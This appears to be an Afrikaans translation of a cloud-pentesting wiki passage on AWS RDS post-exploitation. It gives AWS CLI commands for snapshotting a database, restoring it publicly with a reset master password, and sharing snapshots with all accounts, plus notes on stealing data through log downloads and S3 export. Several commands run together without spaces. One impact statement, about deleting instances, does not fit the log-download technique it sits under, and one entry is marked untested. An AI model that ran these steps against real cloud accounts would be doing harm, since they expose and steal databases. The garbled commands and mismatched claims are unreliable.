Indien die aanvaller genoeg toestemmings het, kan hy 'n DB openbaar toeganklik maak deur 'n snitprent van die DB te skep, en dan 'n openbaar toeganklike DB van die snitprent te maak.
awsrdsdescribe-db-instances# Get DB identifierawsrdscreate-db-snapshot \--db-instance-identifier <db-id> \--db-snapshot-identifier cloudgoat# Get subnet groups & security groupsawsrdsdescribe-db-subnet-groupsawsec2describe-security-groupsawsrdsrestore-db-instance-from-db-snapshot \--db-instance-identifier "new-db-not-malicious" \--db-snapshot-identifier <scapshotId> \--db-subnet-group-name <dbsubnetgroup> \--publicly-accessible \--vpc-security-group-ids <ec2-securitygroup>awsrdsmodify-db-instance \--db-instance-identifier "new-db-not-malicious" \--master-user-password 'Llaody2f6.123' \--apply-immediately# Connect to the new DB after a few mins
'n Aanvaller met hierdie toestemmings kan 'n oomblikopname van 'n DB skep en dit openlik beskikbaar maak. Dan kan hy net 'n DB in sy eie rekening skep van daardie oomblikopname.
As die aanvaller nie die rds:CreateDBSnapshot het nie, kan hy steeds ander geskepte oomblikopnames openbaar maak.
# create snapshotawsrdscreate-db-snapshot--db-instance-identifier<db-instance-identifier>--db-snapshot-identifier<snapshot-name># Make it public/share with attackers accountaws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}
rds:DownloadDBLogFilePortion
'n Aanvaller met die rds:DownloadDBLogFilePortion toestemming kan gedeeltes van 'n RDS-instantie se log lêers aflaai. As sensitiewe data of toegangskredensiale per ongeluk gelog word, kan die aanvaller moontlik hierdie inligting gebruik om hul regte te eskaleer of ongemagtigde aksies uit te voer.
Potensiële impak: Verwydering van bestaande RDS-instanties, en potensiële verlies van data.
rds:StartExportTask
TODO: Toets
'n Aanvaller met hierdie toestemming kan 'n RDS-instantie-snapshot na 'n S3-emmer uitvoer. As die aanvaller beheer het oor die bestemmings-S3-emmer, kan hulle moontlik toegang verkry tot sensitiewe data binne die uitgevoerde snapshot.